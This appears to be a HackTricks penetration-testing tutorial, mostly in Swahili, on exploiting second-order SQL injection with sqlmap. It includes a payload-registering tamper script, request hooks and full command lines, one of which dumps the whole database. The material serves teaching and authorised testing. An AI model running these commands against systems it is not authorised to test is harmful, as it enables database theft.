Second Order Injection with SQLMap

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Vinjari katalogi kamili ya HackTricks Training kwa ajili ya njia za assessment (ARTA/GRTA/AzRTA) na Linux Hacking Expert (LHE).

Support HackTricks

• Angalia subscription plans!
• Jiunge na 💬 Discord group, telegram group, fuata @hacktricks_live kwenye X/Twitter, au angalia LinkedIn page na YouTube channel.
• Shiriki hacking tricks kwa kutuma PRs kwenye HackTricks na HackTricks Cloud github repos.

SQLMap can exploit Second Order SQLis.
Unahitaji kutoa:

• request ambapo sqlinjection payload itahifadhiwa
• request ambapo payload itatekelezwa

Request ambapo SQL injection payload inahifadhiwa inaonyeshwa kama katika injection nyingine yoyote kwenye sqlmap. Request ambapo sqlmap inaweza kusoma output/execution ya injection inaweza kuonyeshwa kwa --second-url au kwa --second-req ikiwa unahitaji kuonyesha complete request kutoka kwenye file.

Simple second order example:

#Get the SQL payload execution with a GET to a url
sqlmap -r login.txt -p username --second-url "http://10.10.10.10/details.php"

#Get the SQL payload execution sending a custom request from a file
sqlmap -r login.txt -p username --second-req details.txt

Katika visa kadhaa hii haitatosha kwa sababu utahitaji kufanya vitendo vingine mbali na kutuma payload na kufikia ukurasa tofauti.

Wakati hili linahitajika unaweza kutumia sqlmap tamper. Kwa mfano script ifuatayo itasajili user mpya ikimtumia sqlmap payload kama email na kufanya logout.

#!/usr/bin/env python

import re
import requests
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL

def dependencies():
pass

def login_account(payload):
proxies = {'http':'http://127.0.0.1:8080'}
cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"}

params = {"username":"asdasdasd", "email":payload, "password":"11111111"}
url = "http://10.10.10.10/create.php"
pr = requests.post(url, data=params, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)

url = "http://10.10.10.10/exit.php"
pr = requests.get(url, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)

def tamper(payload, **kwargs):
headers = kwargs.get("headers", {})
login_account(payload)
return payload

A SQLMap tamper daima hutekelezwa kabla ya kuanza jaribio la injection lenye payload na inapaswa kurudisha payload. Katika kesi hii hatujali payload lakini tunajali kutuma baadhi ya requests, kwa hiyo payload haibadilishwi.

Kwa hiyo, ikiwa kwa sababu fulani tunahitaji flow ngumu zaidi ili kutumia second order SQL injection kama:

• Unda account na payload ya SQLi ndani ya field ya “email”
• Logout
• Login na account hiyo (login.txt)
• Tuma request ili kutekeleza SQL injection (second.txt)

Mstari huu wa sqlmap utasaidia:

sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy http://127.0.0.1:8080 --prefix "a2344r3F'" --technique=U --dbms mysql --union-char "DTEC" -a
##########
# --tamper tamper.py : Indicates the tamper to execute before trying each SQLipayload
# -r login.txt : Indicates the request to send the SQLi payload
# -p email : Focus on email parameter (you can do this with an "email=*" inside login.txt
# --second-req second.txt : Request to send to execute the SQLi and get the ouput
# --proxy http://127.0.0.1:8080 : Use this proxy
# --technique=U : Help sqlmap indicating the technique to use
# --dbms mysql : Help sqlmap indicating the dbms
# --prefix "a2344r3F'" : Help sqlmap detecting the injection indicating the prefix
# --union-char "DTEC" : Help sqlmap indicating a different union-char so it can identify the vuln
# -a : Dump all

Vifaa muhimu katika real second-order flows

Second-order automation kawaida hushindwa kwa sababu payload storage request inafanya kazi, lakini execution request ni noisy, stateful, au protected. Hilo likitokea, bendera zifuatazo kwa kawaida huwa muhimu zaidi kuliko kuongeza payloads zaidi:

sqlmap -r login.txt -p email \
--second-req second.txt \
--csrf-token csrf \
--csrf-url https://target.tld/profile \
--csrf-method POST \
--live-cookies cookies.txt \
--safe-req keepalive.txt \
--safe-freq 1 \
--string "Welcome back" \
--text-only

• --csrf-token, --csrf-url, --csrf-method: Inafaa wakati ombi la store au trigger linahitaji anti-CSRF token mpya kwenye kila jaribio.
• --live-cookies: Pakia upya cookies kabla ya kila ombi. Inafaa wakati browser/Burp macro inaburudisha session state kwa nyuma.
• --safe-req na --safe-freq: Huweka workflow hai wakati application inakutoa nje au kubatilisha session baada ya probe chache zilizoshindwa.
• --string, --not-string, --regexp, --code, --text-only: Inafaa wakati response ya second-order ina banners, ads, timestamps, au junk ya user-generated inayofanya diffing isiwe thabiti.

Wakati --tamper haitoshi

tamper.py bado ndiyo njia rahisi zaidi ya kusajili payload, kutoka nje, kuingia tena, na kuanzisha execution. Hata hivyo, kwenye targets za kisasa mara nyingi ni safi zaidi kuhamisha baadhi ya logic kwenda kwenye request/response hooks:

• --preprocess: Badilisha HTTP request nzima kabla haijatumwa. Inafaa wakati flow ya second-order inahitaji extra nonce, extra parameter, au header normalization.
• --postprocess: Safisha HTTP response kabla sqlmap haijalinganisha. Inafaa wakati second-order sink imefungwa ndani ya dynamic HTML na ni fragment ndogo tu iliyo stable.

Example request/response hooks:

#!/usr/bin/env python
def preprocess(req):
if req.data:
req.data += b"&preview=1"

#!/usr/bin/env python
import re
def postprocess(page, headers=None, code=None):
page = re.sub(br"<span>Generated at .*?</span>", b"", page or b"")
return page, headers, code

Mapungufu muhimu

• Do not assume kwamba --second-req itarudisha payload ileile ndani ya placeholder ya * katika ombi la pili. Ikiwa trigger request pia inahitaji thamani iliyodungwa (au toleo lililotolewa kutoka kwake), tamper maalum, --preprocess, au local proxy kwa kawaida huhitajika.
• Do not rely on --eval kwa ombi la pili. Official usage inaandika --eval kwa primary request flow; ikiwa ombi la pili pia linahitaji mabadiliko kwa kila jaribio, yashughulikie ndani ya helper scripts zako badala yake.

Muundo huu ni muhimu hasa wakati payload inahifadhiwa katika maeneo kama:

• Filename au image metadata ambazo huulizwa baadaye
• Registration/profile fields ambazo baadaye hutumiwa na admin panels
• Sorting/filtering preferences zilizohifadhiwa upande wa server na kuchezeshwa tena baadaye
• Workflow state ambayo hutekelezwa tu baada ya preview, export, au moderation action

Marejeo

• sqlmap official usage wiki
• Second Order SQLi: Automating with sqlmap

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Vinjari katalogi kamili ya HackTricks Training kwa ajili ya njia za assessment (ARTA/GRTA/AzRTA) na Linux Hacking Expert (LHE).

Support HackTricks

• Angalia subscription plans!
• Jiunge na 💬 Discord group, telegram group, fuata @hacktricks_live kwenye X/Twitter, au angalia LinkedIn page na YouTube channel.
• Shiriki hacking tricks kwa kutuma PRs kwenye HackTricks na HackTricks Cloud github repos.